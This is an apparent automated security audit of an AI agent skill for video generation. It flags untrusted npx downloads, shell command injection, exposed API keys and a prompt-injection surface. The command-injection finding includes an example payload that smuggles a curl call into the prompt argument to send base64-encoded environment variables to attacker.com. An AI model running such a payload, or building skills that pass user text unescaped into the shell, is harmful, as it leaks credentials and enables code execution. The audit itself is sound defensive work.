Nano Banana Video Generation
Fail
Audited by Gen Agent Trust Hub on Feb 16, 2026
Risk Level: HIGHEXTERNAL_DOWNLOADSCOMMAND_EXECUTIONCREDENTIALS_UNSAFE
Full Analysis
- [EXTERNAL_DOWNLOADS] (HIGH): The skill requires the installation of a CLI tool via
npx @the-focus-ai/nano-banana. - Evidence: The organization
@the-focus-aiis not a trusted source. Usingnpxto download and execute code from an unknown third-party repository poses a significant risk of remote code execution (RCE) if the package is malicious or its account is compromised. - [COMMAND_EXECUTION] (HIGH): The skill takes natural language input from the user and interpolates it directly into shell commands.
- Evidence: The command
nano-banana --video "<prompt>"executes user-provided strings. An attacker could use shell metacharacters (e.g.,"; curl http://attacker.com/$(env | base64) #") to bypass the intended command and execute arbitrary code on the system. - [CREDENTIALS_UNSAFE] (MEDIUM): The skill instructs the user to store a sensitive
GEMINI_API_KEYin environment variables or a.envfile. - Evidence: While necessary for functionality, the instruction for the agent to manage or interact with a environment containing these credentials increases the risk of exposure, especially when combined with the untrusted CLI tool mentioned above.
- [INDIRECT PROMPT INJECTION] (HIGH): Vulnerability surface identified where untrusted user content is processed by a high-privilege tool.
- Ingestion points: User prompt input for video generation.
- Boundary markers: None (direct interpolation into shell strings).
- Capability inventory: Shell command execution via
nano-bananaCLI. - Sanitization: No evidence of shell escaping or prompt validation before execution.
Recommendations
- AI detected serious security threats
Audit Metadata